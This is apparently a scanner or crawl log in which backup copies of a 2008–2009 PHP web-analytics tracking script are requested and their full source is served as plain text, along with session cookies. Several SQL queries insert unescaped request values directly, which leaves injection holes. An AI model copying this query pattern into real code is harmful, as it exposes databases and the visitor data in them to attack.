$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions_$domainId`(
SessionID, IPAddress, SessionStartTime, ReferringURL,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns_$domainId` WHERE `Active` = 1"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
//echo "//$campaign->Title \n";
$campaignId = $campaign->ID;

// Get all the triggers for the campaign
$triggerResults = $dbConnection->query(
"SELECT * FROM `campaign_triggers_$domainId` WHERE `Active` = '1' AND `CampaignID` = '$campaignId'"
);

while($trigger = $triggerResults->fetch_object()) {
//echo "// ($campaign->IdentifierType)\n";

if ($trigger->IdentifierType == 'Parameter') {
// Parameter-based campaign
//echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($trigger->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$trigger->ParameterToCheck])) {
if ($parameters[$trigger->ParameterToCheck] == $trigger->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
//echo "//Matched\n";
$matchedCampaigns[] = $campaignId;
}
} else if ($trigger->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($trigger->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($trigger->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheckNoQuery = $in_referrerNoQuery;
} else {
continue;
}

// [CB] Modified on 8/22/2008 to handle "partial matches"
// and to ensure case-insensitivity
if ($trigger->IgnoreQueryString == '1') {
$urlToCheck = strtolower($urlToCheckNoQuery);
} else {
$urlToCheck = strtolower($urlToCheck);
}

if ((int)($trigger->PartialMatch) == '1') {
if (stristr($urlToCheck, $trigger->URL) !== false) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == strtolower($trigger->URL)) {
$matchedCampaigns[] = $campaignId;
}
}

/*
if ($trigger->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
}
*/
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}
echo "//BLVDC: $in_blvdC\n\n";

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation_$domainId` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation_$domainId` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation_$domainId(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC'
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO sessions_campaigns_$domainId(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId, $domainId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2008_09_10_r1

/blvdstatus/js/dynamicJS.php_2008_09_10_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2008_09_10_r1

Request

GET /blvdstatus/js/dynamicJS.php_2008_09_10_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:16 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 16:57:00 GMT
ETag: "2548018-2c43-4550f5376af00"
Accept-Ranges: bytes
Content-Length: 11331
Keep-Alive: timeout=15, max=82
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Determine if internal tracking is allowed
if (isset($in_ait) && $in_ait == 'true') {
$allowInternalTracking = true;
} else {
$allowInternalTracking = false;
}

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Find out if we are hitting an internal page
if (strpos($currentUrl, 'blvdstatus.com') !== false) {
$internalHit = true;
} else {
$internalHit = false;
}

echo "//IH: $internalHit / $allowInternalTracking \n";

// If we have an internal hit, and internal tracking is not explicitly allowed
// we bail out now
if ($internalHit && !$allowInternalTracking) {
die('//NIT');
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = (int)$domainIdData->ID;
}
}

// We're done if the domain isn't found.
if ($domainId == 0) {
die("//DNR\n");
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions`(
SessionID, IPAddress, SessionStartTime, ReferringURL, DomainID,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer', '$domainId',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns` WHERE `Active` = 1 AND `DomainID` = '$domainId'"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
//echo "//$campaign->Title \n";
$campaignId = $campaign->ID;

// Get all the triggers for the campaign
$triggerResults = $dbConnection->query(
"SELECT * FROM `campaign_triggers` WHERE `Active` = '1' AND `CampaignID` = '$campaignId'"
);

while($trigger = $triggerResults->fetch_object()) {
//echo "// ($campaign->IdentifierType)\n";

if ($trigger->IdentifierType == 'Parameter') {
// Parameter-based campaign
//echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($trigger->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$trigger->ParameterToCheck])) {
if ($parameters[$trigger->ParameterToCheck] == $trigger->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
//echo "//Matched\n";
$matchedCampaigns[] = $campaignId;
}
} else if ($trigger->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($trigger->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($trigger->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheckNoQuery = $in_referrerNoQuery;
} else {
continue;
}

// [CB] Modified on 8/22/2008 to handle "partial matches"
// and to ensure case-insensitivity
if ($trigger->IgnoreQueryString == '1') {
$urlToCheck = strtolower($urlToCheckNoQuery);
} else {
$urlToCheck = strtolower($urlToCheck);
}

if ((int)($trigger->PartialMatch) == '1') {
if (stristr($urlToCheck, $trigger->URL) !== false) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == strtolower($trigger->URL)) {
$matchedCampaigns[] = $campaignId;
}
}

/*
if ($trigger->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
}
*/
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}
echo "//BLVDC: $in_blvdC\n\n";

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`,
`DomainID`,
`ArrivalYear`, `ArrivalMonth`,
`ArrivalDay`, `ArrivalHour`,
`ArrivalWeekOfYear`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC',
ConvertDomainNameToDomainId(DomainNameFromURL('$safeCurrentUrl')),
YEAR(FROM_UNIXTIME(UNIX_TIMESTAMP())), MONTH(FROM_UNIXTIME(UNIX_TIMESTAMP())),
DAY(FROM_UNIXTIME(UNIX_TIMESTAMP())), HOUR(FROM_UNIXTIME(UNIX_TIMESTAMP())),
WEEK(FROM_UNIXTIME(UNIX_TIMESTAMP()), 6)
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO session_campaigns(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/dynamicJS.php_2009_05_05_r1

/blvdstatus/js/dynamicJS.php_2009_05_05_r1

http://www.seoq.com/blvdstatus/js/dynamicJS.php_2009_05_05_r1

Request

GET /blvdstatus/js/dynamicJS.php_2009_05_05_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:17 GMT
Server: Apache
Last-Modified: Mon, 13 Apr 2009 18:54:40 GMT
ETag: "254801b-2d16-467743f237c00"
Accept-Ranges: bytes
Content-Length: 11542
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");
require_once("../inc/database.php");

require_once("../lib/processing/findSearchEngineData.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

import_request_variables('g', 'in_');

// Determine if internal tracking is allowed
if (isset($in_ait) && $in_ait == 'true') {
$allowInternalTracking = true;
} else {
$allowInternalTracking = false;
}

if (isset($in_tid) && $in_tid != 0) {
$trackingId = $in_tid;
} else {
$trackingId = '';
}

// Query the referrer URL (which in this case is the current page
// on the client's site) and visitor's IP address
if (isset($_SERVER['HTTP_REFERER'])) {
$currentUrl = $_SERVER['HTTP_REFERER'];
} else {
$currentUrl = '';
}

// Find out if we are hitting an internal page
if (strpos($currentUrl, 'blvdstatus.com') !== false) {
$internalHit = true;
} else {
$internalHit = false;
}

echo "//TID: $trackingId \n";
echo "//IH: $internalHit / $allowInternalTracking \n";

// If we have an internal hit, and internal tracking is not explicitly allowed
// we bail out now
if ($internalHit && !$allowInternalTracking) {
die('//NIT');
}

// Get a version of the URL with no query string
if (strpos($currentUrl, '?') !== false) {
$currentUrlNoQuery = substr($currentUrl, 0, strpos($currentUrl, '?'));
} else {
$currentUrlNoQuery = $currentUrl;
}

$ip = $_SERVER['REMOTE_ADDR'];

// Referrer
if (isset($in_referrer)) {
if (strpos($in_referrer, '?') !== false) {
$in_referrerNoQuery = substr($in_referrer, 0, strpos($in_referrer, '?'));
} else {
$in_referrerNoQuery = $in_referrer;
}
} else {
$in_referrer = '';
$in_referrerNoQuery = '';
}

// Title of the page
if (!isset($in_title)) {
$in_title = '';
}

// blvdC - Campaign ID, if any
if (!isset($in_blvdC)) {
$in_blvdC = 0;
}

if (isset($in_screenWidth)) {
$in_screenWidth = (int)$in_screenWidth;
} else {
$in_screenWidth = 0;
}
if (isset($in_screenHeight)) {
$in_screenHeight = (int)$in_screenHeight;
} else {
$in_screenHeight = 0;
}
if (isset($in_screenDepth)) {
$in_screenDepth = (int)$in_screenDepth;
} else {
$in_screenDepth = 0;
}

$userAgent = $dbConnection->escape_string($_SERVER['HTTP_USER_AGENT']);
echo "//UA: $userAgent\n";

// If we have received a session id, maintain it, otherwise
// generate a new one
if (isset($in_blvdSessionId)) {
$sessionId = $in_blvdSessionId;
} else {
$sessionId = '';
}

echo "//Sess set.\n";

// Convert the domain name into a domain ID
// (If this fails, the domain ID will remain set to 0)
$domainId = 0;

// If we had a tracking ID, this is just a lookup, otherwise
// we actually translate the domain name into an ID as best we can
if ($trackingId == '') {
echo "//DLU\n";
$domainIdResults = $dbConnection->query(
"SELECT ConvertDomainNameToDomainID(DomainNameFromURL('$currentUrl')) AS `ID`"
);
} else {
echo "//DFT\n";
$domainIdResults = $dbConnection->query(
"SELECT `ID` FROM `domains` WHERE `TrackingID` = '$trackingId'"
);
}

// Tread carefully here, so errors don't break tracking!
if ($dbConnection->errno == 0) {
$domainIdData = $domainIdResults->fetch_object();
if ($domainIdData) {
$domainId = (int)$domainIdData->ID;
}
}

// We're done if the domain isn't found.
if ($domainId == 0) {
die("//DNR\n");
}

// If this is a new session, generate a unique ID for it, and store it in
// the database
if ($sessionId == '') {
$sessionId = uniqid("", true);

// Query GeoIP data for the user's IP Address
$geoRecord = geoip_record_by_name($ip);

if ($geoRecord === false) {
$geoData = new stdclass();
$geoData->CountryCode = '';
$geoData->Region = '';
$geoData->City = '';
$geoData->PostalCode = '';
$geoData->Latitude = '';
$geoData->Longitude = '';
$geoData->DMACode = '';
$geoData->AreaCode = '';
$geoData->ISP = '';
} else {
$geoData = new stdclass();
$geoData->CountryCode = $geoRecord['country_code'];
$geoData->Region = $geoRecord['region'];
$geoData->City = $geoRecord['city'];
$geoData->PostalCode = $geoRecord['postal_code'];
$geoData->Latitude = $geoRecord['latitude'];
$geoData->Longitude = $geoRecord['longitude'];
$geoData->DMACode = $geoRecord['dma_code'];
$geoData->AreaCode = $geoRecord['area_code'];
$geoData->ISP = geoip_isp_by_name($ip);
}

// Parse browser data
$ua = get_browser($userAgent);
$browserName = $dbConnection->escape_string($ua->browser);
$browserVersion = $dbConnection->escape_string($ua->version);
$platform = $dbConnection->escape_string($ua->platform);

// Bind the session ID to the user's IP address
$dbConnection->query(
<<<EOQ
INSERT INTO `sessions_$domainId`(
SessionID, IPAddress, SessionStartTime, ReferringURL,
ScreenWidth, ScreenHeight, ScreenDepth, UserAgent,
GeoIPCountryCode, GeoIPRegion, GeoIPCity, GeoIPPostalCode,
GeoIPLatitude, GeoIPLongitude, GeoIPDMACode, GeoIPAreaCode,
GeoIPISP, BrowserName, BrowserVersion, Platform
)
VALUES(
'$sessionId', '$ip', UNIX_TIMESTAMP(), '$in_referrer',
'$in_screenWidth', '$in_screenHeight', '$in_screenDepth', '$userAgent',
'$geoData->CountryCode', '$geoData->Region', '$geoData->City', '$geoData->PostalCode',
'$geoData->Latitude', '$geoData->Longitude', '$geoData->DMACode', '$geoData->AreaCode',
'$geoData->ISP', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//Sess: " . $dbConnection->error . "\n";

// If necessary, store the user agent information in the 'user_agent_data'
// table.
$dbConnection->query(
<<<EOQ
INSERT IGNORE INTO `user_agent_data`(
`UA`, `BrowserName`, `BrowserVersion`, `Platform`
)
VALUES(
'$userAgent', '$browserName', '$browserVersion', '$platform'
)
EOQ
);

echo "//UA: " . $dbConnection->error . "\n";
}

// *********************************
// Process campaigns for this domain
// *********************************

$matchedCampaigns = array();

echo "//D: $domainId\n";

// Retrieve all of the campaigns
if ($domainId > 0) {
$campaignResults = $dbConnection->query(
"SELECT * FROM `campaigns_$domainId` WHERE `Active` = 1"
);

echo '//CRes: ' . $dbConnection->error . "\n";

while($campaign = $campaignResults->fetch_object()) {
//echo "//$campaign->Title \n";
$campaignId = $campaign->ID;

// Get all the triggers for the campaign
$triggerResults = $dbConnection->query(
"SELECT * FROM `campaign_triggers_$domainId` WHERE `Active` = '1' AND `CampaignID` = '$campaignId'"
);

while($trigger = $triggerResults->fetch_object()) {
//echo "// ($campaign->IdentifierType)\n";

if ($trigger->IdentifierType == 'Parameter') {
// Parameter-based campaign
//echo "//Parameter based.\n";

$matched = false;

// Does the URL match the base URL defined by the
// campaign? (Skip this step if the URL is defined as '*')
if ($trigger->URL != '*') {
// TODO
}

// Parse the URL and extract the query string
$queryString = substr(
$currentUrl,
strpos($currentUrl, '?') + 1
);

$parameters = array();
parse_str($queryString, $parameters);

// Check if the parameter to check exists and then
// check if it is equal to the defined value
if (isset($parameters[$trigger->ParameterToCheck])) {
if ($parameters[$trigger->ParameterToCheck] == $trigger->ValueToCheck) {
$matched = true;
}
}

// If we matched, add the campaign ID to the campaign list
if ($matched) {
//echo "//Matched\n";
$matchedCampaigns[] = $campaignId;
}
} else if ($trigger->IdentifierType == 'URL') {
// Are we checking the current or referring URL? If not, this
// campaign will need to be handled by the "leave.php" script!
if ($trigger->TriggerType == 'CurrentPage') {
$urlToCheck = $currentUrl;
$urlToCheckNoQuery = $currentUrlNoQuery;
} else if ($trigger->TriggerType == 'CameFrom') {
$urlToCheck = $in_referrer;
$urlToCheckNoQuery = $in_referrerNoQuery;
} else {
continue;
}

// [CB] Modified on 8/22/2008 to handle "partial matches"
// and to ensure case-insensitivity
if ($trigger->IgnoreQueryString == '1') {
$urlToCheck = strtolower($urlToCheckNoQuery);
} else {
$urlToCheck = strtolower($urlToCheck);
}

if ((int)($trigger->PartialMatch) == '1') {
if (stristr($urlToCheck, $trigger->URL) !== false) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == strtolower($trigger->URL)) {
$matchedCampaigns[] = $campaignId;
}
}

/*
if ($trigger->IgnoreQueryString == '1') {
if ($urlToCheckNoQuery == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
} else {
if ($urlToCheck == $trigger->URL) {
$matchedCampaigns[] = $campaignId;
}
}
*/
}
}
}
}

// XXXX: This is not the correct way to handle this -- need to add multiple
// campaign support to the database!
if ($in_blvdC == 0 && count($matchedCampaigns) > 0) {
$in_blvdC = $matchedCampaigns[0];
}
echo "//BLVDC: $in_blvdC\n\n";

// Look for the previous hit for this session
$lastNavigationResults = $dbConnection->query(
<<<EOQ
SELECT *
FROM
`navigation_$domainId` n
WHERE
n.`SessionID` = '$sessionId'
ORDER BY
n.`ID` DESC
LIMIT 1
EOQ
);

$lastNavigationItem = $lastNavigationResults->fetch_object();
if ($lastNavigationItem) {
if ((int)$lastNavigationItem->DepartureTime == 0) {
// Use the arrival time for this page as the departure time for the
// previous navigation item (this is not exact, but it is a good
// guess).
$dbConnection->query(
"UPDATE `navigation_$domainId` " .
"SET `DepartureTime` = UNIX_TIMESTAMP() " .
"WHERE `ID` = '$lastNavigationItem->ID'"
);
echo "//LNI + DT: " . $dbConnection->error . " \n";
}
}

// Store this page hit
$safeTitle = $dbConnection->escape_string($in_title);
$safeCurrentUrl = $dbConnection->escape_string($currentUrl);
$safeReferrer = $dbConnection->escape_string($in_referrer);

$dbConnection->query(
<<<EOQ
INSERT INTO navigation_$domainId(
`CameFrom`, `ReferrerDomain`, `CurrentPage`, `CurrentPageTitle`,
`ArrivalTime`, `SessionID`, `CurrentPageCampaignID`
)
VALUES(
'$in_referrer', DomainNameFromURL('$safeReferrer'), '$safeCurrentUrl', '$safeTitle',
UNIX_TIMESTAMP(), '$sessionId', '$in_blvdC'
)
EOQ
);

echo '//StoreNav: ' . $dbConnection->error . "\n";

// Get the ID of the newly generated navigation row
$navigationId = $dbConnection->insert_id;
//echo "//NID: $navigationId\n";

// Store campaign information for the session, if applicable
if ($in_blvdC > 0) {
$dbConnection->query(
<<<EOQ
INSERT INTO sessions_campaigns_$domainId(SessionID, NavigationID, CampaignID, TimeOfConversion)
VALUES('$sessionId', '$navigationId', '$in_blvdC', UNIX_TIMESTAMP())
EOQ
);
}

// Process search engine information
findSearchEngineData($dbConnection, $in_referrer, $navigationId, $domainId);

// Tracking flags are blank for this script right now
$trackingFlags = 0;

require('trackingJS.php');

?>

- /blvdstatus/js/initBlvdJS.php_2008_08_12_r2

/blvdstatus/js/initBlvdJS.php_2008_08_12_r2

http://www.seoq.com/blvdstatus/js/initBlvdJS.php_2008_08_12_r2

Request

GET /blvdstatus/js/initBlvdJS.php_2008_08_12_r2 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

